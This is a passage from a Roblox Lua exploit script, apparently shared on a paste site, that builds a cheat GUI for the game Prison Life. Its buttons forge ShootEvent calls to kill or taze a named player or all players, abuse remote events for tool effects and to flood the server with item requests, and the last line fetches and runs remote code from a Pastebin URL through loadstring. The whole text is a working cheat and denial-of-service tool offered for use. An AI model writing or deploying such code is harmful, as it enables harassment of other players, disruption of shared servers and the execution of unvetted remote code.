  5228.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5229.  
  5230. end
  5231. wait(0.01)
  5232.  
  5233. end
  5234. end)
  5235.  
  5236. drill.Name = "drill"
  5237. drill.Parent = main
  5238. drill.BackgroundColor3 = Color3.new(1, 1, 0)
  5239. drill.Position = UDim2.new(0.343317509, 0, 0.704794705, 0)
  5240. drill.Size = UDim2.new(0, 111, 0, 25)
  5241. drill.Font = Enum.Font.GothamBold
  5242. drill.Text = "Fe Drill"
  5243. drill.TextColor3 = Color3.new(0, 0, 0)
  5244. drill.TextSize = 14
  5245. drill.MouseButton1Down:connect(function()
  5246. workspace.Remote.TeamEvent:FireServer("Bright blue")
  5247.  
  5248. local toolamount = 80 -- How long the tornado is
  5249. local tornadosize = 1 -- The size of how big the opening of the tornado is
  5250.  
  5251. local LocalPlayer = game:GetService("Players").LocalPlayer
  5252. local runservice = game:GetService("RunService")
  5253. local characters = {}
  5254. LocalPlayer.Character:FindFirstChild("Humanoid"):UnequipTools()
  5255. local currentamount = #LocalPlayer.Backpack:GetChildren()
  5256. LocalPlayer.Character.Archivable = true
  5257. local tempchar = LocalPlayer.Character:Clone()
  5258. tempchar.Parent = workspace
  5259. local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame
  5260. local renderstepped = runservice.RenderStepped:Connect(function()
  5261.     workspace.CurrentCamera.CameraSubject = tempchar:FindFirstChild("Humanoid")
  5262.     for _, tool in pairs(LocalPlayer.Backpack:GetChildren()) do
  5263.     if tool:IsA("Tool") then
  5264.             tool.Parent = LocalPlayer
  5265.         end
  5266.     end
  5267.     LocalPlayer.Character:ClearAllChildren()
  5268.     local char = Instance.new("Model", workspace)
  5269.     table.insert(characters, char)
  5270.     Instance.new("Humanoid", char)
  5271.     LocalPlayer.Character = char
  5272.     repeat runservice.RenderStepped:Wait() until LocalPlayer.Character ~= nil
  5273. end)
  5274. repeat runservice.RenderStepped:Wait() until #LocalPlayer:GetChildren() - 4 - currentamount >= toolamount
  5275. renderstepped:Disconnect()
  5276. repeat runservice.RenderStepped:Wait() until LocalPlayer.Character:FindFirstChild("HumanoidRootPart") ~= nil
  5277. for _, char in pairs(characters) do
  5278.     char:Destroy()
  5279. end
  5280. for index, tool in pairs(LocalPlayer:GetChildren()) do
  5281.     if tool:IsA("Tool") then
  5282.         tool.Parent = LocalPlayer.Backpack
  5283.         tool.Handle.Massless = false
  5284.         tool.Grip = CFrame.new(Vector3.new(0, -index * .1, 0)) * CFrame.Angles(math.rad(90), 0, math.tan(index * 0.5))
  5285.         tool.Parent = LocalPlayer.Character
  5286.         if tool.Handle:FindFirstChild("Mesh") ~= nil then
  5287.             tool.Handle.Mesh:Destroy()
  5288.         end
  5289.     end
  5290. end
  5291. LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos
  5292. tempchar:Destroy()
  5293. end)
  5294.  
  5295. killplrmain.Name = "killplrmain"
  5296. killplrmain.Parent = main
  5297. killplrmain.BackgroundColor3 = Color3.new(1, 0, 1)
  5298. killplrmain.Position = UDim2.new(0.0321613066, 0, 0.836535037, 0)
  5299. killplrmain.Size = UDim2.new(0, 103, 0, 47)
  5300.  
  5301. killtext.Name = "killtext"
  5302. killtext.Parent = killplrmain
  5303. killtext.BackgroundColor3 = Color3.new(1, 0.666667, 1)
  5304. killtext.Position = UDim2.new(0, 0, 0.0212752968, 0)
  5305. killtext.Size = UDim2.new(0, 99, 0, 19)
  5306. killtext.Font = Enum.Font.Gotham
  5307. killtext.Text = "Player Name"
  5308. killtext.TextColor3 = Color3.new(0, 0, 0)
  5309. killtext.TextSize = 14
  5310.  
  5311. kill.Name = "kill"
  5312. kill.Parent = killplrmain
  5313. kill.BackgroundColor3 = Color3.new(0, 0, 0)
  5314. kill.Position = UDim2.new(0.0999999046, 0, 0.531914949, 0)
  5315. kill.Size = UDim2.new(0, 80, 0, 22)
  5316. kill.Font = Enum.Font.GothamBold
  5317. kill.Text = "KILL"
  5318. kill.TextColor3 = Color3.new(1, 1, 1)
  5319. kill.TextSize = 14
  5320. kill.MouseButton1Down:connect(function()
  5321. game.Workspace.Remote.ItemHandler:InvokeServer(workspace.Prison_ITEMS.giver["Remington 870"].ITEMPICKUP)
  5322.  
  5323. wait(0.1)
  5324. Workspace.Remote.TeamEvent:FireServer("Medium stone grey")
  5325.  
  5326. local A_1 =
  5327. {
  5328.     [1] =
  5329. {
  5330.     ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(277.738678, 6.89340925, 287.773712)),
  5331.     ["Distance"] = 4.7204174995422,
  5332.     ["Cframe"] = CFrame.new(832.049377, 101.392006, 2300.97168, 0.843892097, -0.0554918349, 0.533635378, 0, 0.994636595, 0.103430569, -0.536512911, -0.0872842371, 0.839366019),
  5333.     ["Hit"] = game.Workspace[killtext.Text].Head
  5334. },
  5335.     [2] =
  5336. {
  5337.     ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(303.047546, 21.3568707, 260.203888)),
  5338.     ["Distance"] = 4.8114862442017,
  5339.     ["Cframe"] = CFrame.new(832.390259, 101.550629, 2300.74097, 0.738044441, -0.112958886, 0.665229917, 7.45057971e-09, 0.985887885, 0.16740793, -0.674752235, -0.123554483, 0.727628946),
  5340.     ["Hit"] = game.Workspace[killtext.Text].Head
  5341. },
  5342.     [3] =
  5343. {
  5344.     ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(296.800507, 7.00420141, 268.067932)),
  5345.     ["Distance"] = 4.444625377655,
  5346.     ["Cframe"] = CFrame.new(832.185486, 101.391617, 2300.70264, 0.775115669, -0.0692948848, 0.628007889, 7.45057971e-09, 0.993967533, 0.109675139, -0.631819367, -0.0850109085, 0.770439863),
  5347.     ["Hit"] = game.Workspace[killtext.Text].Head
  5348. },
  5349.     [4] =
  5350. {
  5351.     ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(284.930573, 11.9850616, 280.483368)),
  5352.     ["Distance"] = 4.6211166381836,
  5353.     ["Cframe"] = CFrame.new(832.10083, 101.445007, 2300.86963, 0.820150614, -0.0735745132, 0.567397356, 0, 0.991697431, 0.128593579, -0.572147667, -0.105466105, 0.81334126),
  5354.     ["Hit"] = game.Workspace[killtext.Text].Head
  5355. },
  5356.     [5] =
  5357. {
  5358.     ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(294.625824, 2.15741801, 270.538269)),
  5359.     ["Distance"] = 4.4639973640442,
  5360.     ["Cframe"] = CFrame.new(832.169434, 101.341301, 2300.73438, 0.784266233, -0.0537625961, 0.618090749, -3.7252903e-09, 0.99623847, 0.086654529, -0.620424569, -0.0679602176, 0.781316102),
  5361.     ["Hit"] = game.Workspace[killtext.Text].Head
  5362. }
  5363. }
  5364. local A_2 = game.Players.LocalPlayer.Backpack["Remington 870"]
  5365. local Event = game:GetService("ReplicatedStorage").ShootEvent
  5366. Event:FireServer(A_1, A_2)
  5367.  
  5368. wait(0.5)
  5369. workspace.Remote.TeamEvent:FireServer("Bright orange")
  5370. end)
  5371.  
  5372. waves.Name = "waves"
  5373. waves.Parent = main
  5374. waves.BackgroundColor3 = Color3.new(1, 1, 0)
  5375. waves.Position = UDim2.new(0.0201378968, 0, 0.646579564, 0)
  5376. waves.Size = UDim2.new(0, 111, 0, 26)
  5377. waves.Font = Enum.Font.GothamBold
  5378. waves.Text = "Fe Waves"
  5379. waves.TextColor3 = Color3.new(0, 0, 0)
  5380. waves.TextSize = 14
  5381. waves.MouseButton1Down:connect(function()
  5382. workspace.Remote.TeamEvent:FireServer("Bright blue")
  5383.  
  5384. local toolamount = 40 -- How long the tornado is
  5385. local tornadosize = 1 -- The size of how big the opening of the tornado is
  5386.  
  5387. local LocalPlayer = game:GetService("Players").LocalPlayer
  5388. local runservice = game:GetService("RunService")
  5389. local characters = {}
  5390. LocalPlayer.Character:FindFirstChild("Humanoid"):UnequipTools()
  5391. local currentamount = #LocalPlayer.Backpack:GetChildren()
  5392. LocalPlayer.Character.Archivable = true
  5393. local tempchar = LocalPlayer.Character:Clone()
  5394. tempchar.Parent = workspace
  5395. local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame
  5396. local renderstepped = runservice.RenderStepped:Connect(function()
  5397.     workspace.CurrentCamera.CameraSubject = tempchar:FindFirstChild("Humanoid")
  5398.     for _, tool in pairs(LocalPlayer.Backpack:GetChildren()) do
  5399.     if tool:IsA("Tool") then
  5400.             tool.Parent = LocalPlayer
  5401.         end
  5402.     end
  5403.     LocalPlayer.Character:ClearAllChildren()
  5404.     local char = Instance.new("Model", workspace)
  5405.     table.insert(characters, char)
  5406.     Instance.new("Humanoid", char)
  5407.     LocalPlayer.Character = char
  5408.     repeat runservice.RenderStepped:Wait() until LocalPlayer.Character ~= nil
  5409. end)
  5410. repeat runservice.RenderStepped:Wait() until #LocalPlayer:GetChildren() - 4 - currentamount >= toolamount
  5411. renderstepped:Disconnect()
  5412. repeat runservice.RenderStepped:Wait() until LocalPlayer.Character:FindFirstChild("HumanoidRootPart") ~= nil
  5413. for _, char in pairs(characters) do
  5414.     char:Destroy()
  5415. end
  5416. for index, tool in pairs(LocalPlayer:GetChildren()) do
  5417.     if tool:IsA("Tool") then
  5418.         tool.Parent = LocalPlayer.Backpack
  5419.         tool.Handle.Massless = false
  5420.         tool.Grip = CFrame.new(Vector3.new(0, math.sin(index + 0.5), index)) * CFrame.Angles(math.rad(tornadosize), 0, -index)
  5421.         tool.Parent = LocalPlayer.Character
  5422.         if tool.Handle:FindFirstChild("Mesh") ~= nil then
  5423.             tool.Handle.Mesh:Destroy()
  5424.         end
  5425.     end
  5426. end
  5427. LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos
  5428. tempchar:Destroy()
  5429. end)
  5430.  
  5431. bigbowl.Name = "bigbowl"
  5432. bigbowl.Parent = main
  5433. bigbowl.BackgroundColor3 = Color3.new(1, 1, 0)
  5434. bigbowl.Position = UDim2.new(0.341908664, 0, 0.647788644, 0)
  5435. bigbowl.Size = UDim2.new(0, 111, 0, 26)
  5436. bigbowl.Font = Enum.Font.GothamBold
  5437. bigbowl.Text = "Fe Big Bowl"
  5438. bigbowl.TextColor3 = Color3.new(0, 0, 0)
  5439. bigbowl.TextSize = 14
  5440. bigbowl.MouseButton1Down:connect(function()
  5441. workspace.Remote.TeamEvent:FireServer("Bright blue")
  5442.  
  5443. local toolamount = 250 -- How much covered the bowl is
  5444. local bowlsize = 20 -- How big the bowl is
  5445.  
  5446.  
  5447.  
  5448. local LocalPlayer = game:GetService("Players").LocalPlayer
  5449. local runservice = game:GetService("RunService")
  5450. local characters = {}
  5451. LocalPlayer.Character:FindFirstChild("Humanoid"):UnequipTools()
  5452. local currentamount = #LocalPlayer.Backpack:GetChildren()
  5453. LocalPlayer.Character.Archivable = true
  5454. local tempchar = LocalPlayer.Character:Clone()
  5455. tempchar.Parent = workspace
  5456. local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame
  5457. local renderstepped = runservice.RenderStepped:Connect(function()
  5458. workspace.CurrentCamera.CameraSubject = tempchar:FindFirstChild("Humanoid")
  5459. for _, tool in pairs(LocalPlayer.Backpack:GetChildren()) do
  5460. if tool:IsA("Tool") then
  5461. tool.Parent = LocalPlayer
  5462. end
  5463. end
  5464. LocalPlayer.Character:ClearAllChildren()
  5465. local char = Instance.new("Model", workspace)
  5466. table.insert(characters, char)
  5467. Instance.new("Humanoid", char)
  5468. LocalPlayer.Character = char
  5469. repeat runservice.RenderStepped:Wait() until LocalPlayer.Character ~= nil
  5470. end)
  5471. repeat runservice.RenderStepped:Wait() until #LocalPlayer:GetChildren() - 4 - currentamount >= toolamount
  5472. renderstepped:Disconnect()
  5473. repeat runservice.RenderStepped:Wait() until LocalPlayer.Character:FindFirstChild("HumanoidRootPart") ~= nil
  5474. for _, char in pairs(characters) do
  5475. char:Destroy()
  5476. end
  5477. for index, tool in pairs(LocalPlayer:GetChildren()) do
  5478. if tool:IsA("Tool") then
  5479. tool.Parent = LocalPlayer.Backpack
  5480. tool.Handle.Massless = true
  5481. tool.Grip = CFrame.new(Vector3.new(math.sin(index * 0.1), bowlsize, 0)) * CFrame.Angles(math.sin(index * 0.1), index, 0)
  5482. tool.Parent = LocalPlayer.Character
  5483. if tool.Handle:FindFirstChild("Mesh") ~= nil then
  5484. tool.Handle.Mesh:Destroy()
  5485. end
  5486. end
  5487. end
  5488. LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos
  5489. tempchar:Destroy()
  5490. LocalPlayer.Character:FindFirstChild("Humanoid").HipHeight = bowlsize
  5491. end)
  5492.  
  5493. tazeplrmain.Name = "tazeplrmain"
  5494. tazeplrmain.Parent = main
  5495. tazeplrmain.BackgroundColor3 = Color3.new(1, 0, 1)
  5496. tazeplrmain.Position = UDim2.new(0.358376801, 0, 0.83788842, 0)
  5497. tazeplrmain.Size = UDim2.new(0, 103, 0, 47)
  5498.  
  5499. tazetext.Name = "tazetext"
  5500. tazetext.Parent = tazeplrmain
  5501. tazetext.BackgroundColor3 = Color3.new(1, 0.666667, 1)
  5502. tazetext.Size = UDim2.new(0, 99, 0, 19)
  5503. tazetext.Font = Enum.Font.Gotham
  5504. tazetext.Text = "Player Name"
  5505. tazetext.TextColor3 = Color3.new(0, 0, 0)
  5506. tazetext.TextSize = 14
  5507.  
  5508. taze.Name = "taze"
  5509. taze.Parent = tazeplrmain
  5510. taze.BackgroundColor3 = Color3.new(0, 0, 0)
  5511. taze.Position = UDim2.new(0.128543824, 0, 0.510639191, 0)
  5512. taze.Size = UDim2.new(0, 80, 0, 22)
  5513. taze.Font = Enum.Font.GothamBold
  5514. taze.Text = "TAZE"
  5515. taze.TextColor3 = Color3.new(1, 1, 1)
  5516. taze.TextSize = 14
  5517. taze.MouseButton1Down:connect(function()
  5518. local A_1 =
  5519. {
  5520.     [1] =
  5521. {
  5522.     ["RayObject"] = Ray.new(Vector3.new(829.838562, 101.489998, 2331.25635), Vector3.new(-30.6540909, -5.42795324, 95.0308533)),
  5523.     ["Distance"] = 15.355997085571,
  5524.     ["Cframe"] = CFrame.new(826.616699, 100.8508, 2340.11279, 0.964640439, -0.00993416365, -0.263382077, 9.31322575e-10, 0.999289393, -0.0376908854, 0.263569355, 0.0363581516, 0.963954985),
  5525.     ["Hit"] = game.Workspace[tazetext.Text].Torso
  5526. }
  5527. }
  5528. local A_2 = game.Players.LocalPlayer.Backpack["Taser"]
  5529. local Event = game:GetService("ReplicatedStorage").ShootEvent
  5530. Event:FireServer(A_1, A_2)
  5531. end)
  5532.  
  5533. teamcrim.Name = "teamcrim"
  5534. teamcrim.Parent = main
  5535. teamcrim.BackgroundColor3 = Color3.new(1, 0, 0)
  5536. teamcrim.Position = UDim2.new(0.775380731, 0, 0.108776733, 0)
  5537. teamcrim.Size = UDim2.new(0, 83, 0, 22)
  5538. teamcrim.Font = Enum.Font.GothamBlack
  5539. teamcrim.Text = "Team Crim"
  5540. teamcrim.TextColor3 = Color3.new(0, 0, 0)
  5541. teamcrim.TextSize = 14
  5542. teamcrim.MouseButton1Down:connect(function()
  5543. wait(0.3)
  5544. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-976.125183, 109.123924, 2059.99536)
  5545.  
  5546. wait(0.3)
  5547. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(918.77,100,2379.07)
  5548. end)
  5549.  
  5550. tazeall.Name = "tazeall"
  5551. tazeall.Parent = main
  5552. tazeall.BackgroundColor3 = Color3.new(1, 0, 0)
  5553. tazeall.Position = UDim2.new(0.342309177, 0, 0.759402633, 0)
  5554. tazeall.Size = UDim2.new(0, 109, 0, 34)
  5555. tazeall.Font = Enum.Font.GothamBold
  5556. tazeall.Text = "Taze All"
  5557. tazeall.TextColor3 = Color3.new(0, 0, 0)
  5558. tazeall.TextSize = 14
  5559. tazeall.MouseButton1Down:connect(function()
  5560. workspace.Remote.TeamEvent:FireServer("Bright blue")
  5561.  
  5562. function kill(a)
  5563. local A_1 =
  5564. {
  5565.     [1] =
  5566. {
  5567.     ["RayObject"] = Ray.new(Vector3.new(829.838562, 101.489998, 2331.25635), Vector3.new(-30.6540909, -5.42795324, 95.0308533)),
  5568.     ["Distance"] = 15.355997085571,
  5569.     ["Cframe"] = CFrame.new(826.616699, 100.8508, 2340.11279, 0.964640439, -0.00993416365, -0.263382077, 9.31322575e-10, 0.999289393, -0.0376908854, 0.263569355, 0.0363581516, 0.963954985),
  5570.     ["Hit"] = a.Character.Torso
  5571. }
  5572. }
  5573. local A_2 = game.Players.LocalPlayer.Backpack["Taser"]
  5574. local Event = game:GetService("ReplicatedStorage").ShootEvent
  5575. Event:FireServer(A_1, A_2)
  5576. end
  5577.  
  5578. for i,v in pairs(game.Players:GetChildren())do
  5579. if v.Name ~= game.Players.LocalPlayer.Name then
  5580. kill(v)
  5581. end
  5582. end
  5583. end)
  5584.  
  5585. removewalls.Name = "removewalls"
  5586. removewalls.Parent = main
  5587. removewalls.BackgroundColor3 = Color3.new(1, 0, 0)
  5588. removewalls.Position = UDim2.new(0.670628905, 0, 0.758472741, 0)
  5589. removewalls.Size = UDim2.new(0, 110, 0, 34)
  5590. removewalls.Font = Enum.Font.GothamBold
  5591. removewalls.Text = "Remove Walls"
  5592. removewalls.TextColor3 = Color3.new(0, 0, 0)
  5593. removewalls.TextSize = 14
  5594. removewalls.MouseButton1Down:connect(function()
  5595. wait(0.1)
  5596. game.Workspace.Prison_Guard_Outpost:Remove()
  5597.  
  5598. wait(0.1)
  5599. game.Workspace.Prison_Cafeteria.building:Remove()
  5600.  
  5601. wait(0.1)
  5602. game.Workspace.Prison_Cafeteria.glass:Remove()
  5603.  
  5604. wait(0.1)
  5605. game.Workspace.Prison_Cafeteria.oven:Remove()
  5606.  
  5607. wait(0.1)
  5608. game.Workspace.Prison_Cafeteria.shelves:Remove()
  5609.  
  5610. wait(0.1)
  5611. game.Workspace.Prison_Cafeteria.vents:Remove()
  5612.  
  5613. wait(0.1)
  5614. game.Workspace.Prison_Cafeteria.accents:Remove()
  5615.  
  5616. wait(0.1)
  5617. game.Workspace.Prison_Cafeteria.vendingmachine:Remove()
  5618.  
  5619. wait(0.1)
  5620. game.Workspace.Prison_Cafeteria.Prison_table1:Remove()
  5621.  
  5622. wait(0.1)
  5623. game.Workspace.Prison_Cafeteria.counter:Remove()
  5624.  
  5625. wait(0.1)
  5626. game.Workspace.Prison_Cafeteria.boxes:Remove()
  5627. end)
  5628.  
  5629. removeall.Name = "removeall"
  5630. removeall.Parent = main
  5631. removeall.BackgroundColor3 = Color3.new(1, 0, 0)
  5632. removeall.Position = UDim2.new(0.673120499, 0, 0.838146329, 0)
  5633. removeall.Size = UDim2.new(0, 110, 0, 47)
  5634. removeall.Font = Enum.Font.GothamBold
  5635. removeall.Text = "Remove All"
  5636. removeall.TextColor3 = Color3.new(0, 0, 0)
  5637. removeall.TextSize = 14
  5638. removeall.MouseButton1Down:connect(function()
  5639. wait(0.1)
  5640. game.Workspace.Prison_Halls.walls:Remove()
  5641.  
  5642. wait(0.1)
  5643. game.Workspace.Prison_Halls.roof:Remove()
  5644.  
  5645. wait(0.1)
  5646. game.Workspace.Prison_Halls.outlines:Remove()
  5647.  
  5648. wait(0.1)
  5649. game.Workspace.Prison_Halls.lights:Remove()
  5650.  
  5651. wait(0.1)
  5652. Workspace.Prison_Halls.accent:Remove()
  5653.  
  5654. wait(0.1)
  5655. game.Workspace.Prison_Halls.glass:Remove()
  5656.  
  5657. wait(0.1)
  5658. game.Workspace.Prison_Cellblock.b_front:Remove()
  5659.  
  5660. wait(0.1)
  5661. game.Workspace.Prison_Cellblock.doors:Remove()
  5662.  
  5663. wait(0.1)
  5664. game.Workspace.Prison_Cellblock.c_tables:Remove()
  5665.  
  5666. wait(0.1)
  5667. game.Workspace.Prison_Cellblock.a_front:Remove()
  5668.  
  5669. wait(0.1)
  5670. game.Workspace.Prison_Cellblock.b_outerwall:Remove()
  5671.  
  5672. wait(0.1)
  5673. game.Workspace.Prison_Cellblock.c_wall:Remove()
  5674.  
  5675. wait(0.1)
  5676. game.Workspace.Prison_Cellblock.b_wall:Remove()
  5677.  
  5678. wait(0.1)
  5679. game.Workspace.Prison_Cellblock.c_hallwall:Remove()
  5680.  
  5681. wait(0.1)
  5682. game.Workspace.Prison_Cellblock.a_outerwall:Remove()
  5683.  
  5684. wait(0.1)
  5685. game.Workspace.Prison_Cellblock.b_ramp:Remove()
  5686.  
  5687. wait(0.1)
  5688. game.Workspace.Prison_Cellblock.a_ramp:Remove()
  5689.  
  5690. wait(0.1)
  5691. game.Workspace.Prison_Cellblock.a_walls:Remove()
  5692.  
  5693. wait(0.1)
  5694. game.Workspace.Prison_Cellblock.Cells_B:Remove()
  5695.  
  5696. wait(0.1)
  5697. game.Workspace.Prison_Cellblock.Cells_A:Remove()
  5698.  
  5699. wait(0.1)
  5700. game.Workspace.Prison_Cellblock.c_corner:Remove()
  5701.  
  5702. wait(0.1)
  5703. game.Workspace.Prison_Cellblock.Wedge:Remove()
  5704.  
  5705. wait(0.1)
  5706. game.Workspace.Prison_Cellblock.a_ceiling:Remove()
  5707.  
  5708. wait(0.1)
  5709. game.Workspace.Prison_Cellblock.b_ceiling:Remove()
  5710.  
  5711. wait(0.1)
  5712. game.Workspace.City_buildings:Remove()
  5713.  
  5714. wait(0.1)
  5715. game.Workspace.Prison_OuterWall:Remove()
  5716.  
  5717. wait(0.1)
  5718. game.Workspace.Prison_Fences:Remove()
  5719. end)
  5720.  
  5721. lagserver.Name = "lagserver"
  5722. lagserver.Parent = main
  5723. lagserver.BackgroundColor3 = Color3.new(0.333333, 0, 0.498039)
  5724. lagserver.Position = UDim2.new(0.66476965, 0, 0.659647882, 0)
  5725. lagserver.Size = UDim2.new(0, 120, 0, 42)
  5726. lagserver.Font = Enum.Font.GothamBold
  5727. lagserver.Text = "Lag Server (Swat)"
  5728. lagserver.TextColor3 = Color3.new(0, 1, 1)
  5729. lagserver.TextSize = 14
  5730. lagserver.MouseButton1Down:connect(function()
  5731. while true do
  5732. workspace.Remote.TeamEvent:FireServer("Bright blue")
  5733.  
  5734. for i = 10000,999999999999999,1 do
  5735.     for i,v in pairs(Workspace.Prison_ITEMS.clothes:GetChildren()) do
  5736.  
  5737. lol = Workspace.Remote.ItemHandler:InvokeServer(v.ITEMPICKUP)
  5738. print(lol)
  5739. end
  5740. end
  5741. end
  5742.  
  5743. end)
  5744. -- Scripts:
  5745. loadstring(game:HttpGet(('https://pastebin.com/raw/tzTXmYf2'),true))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement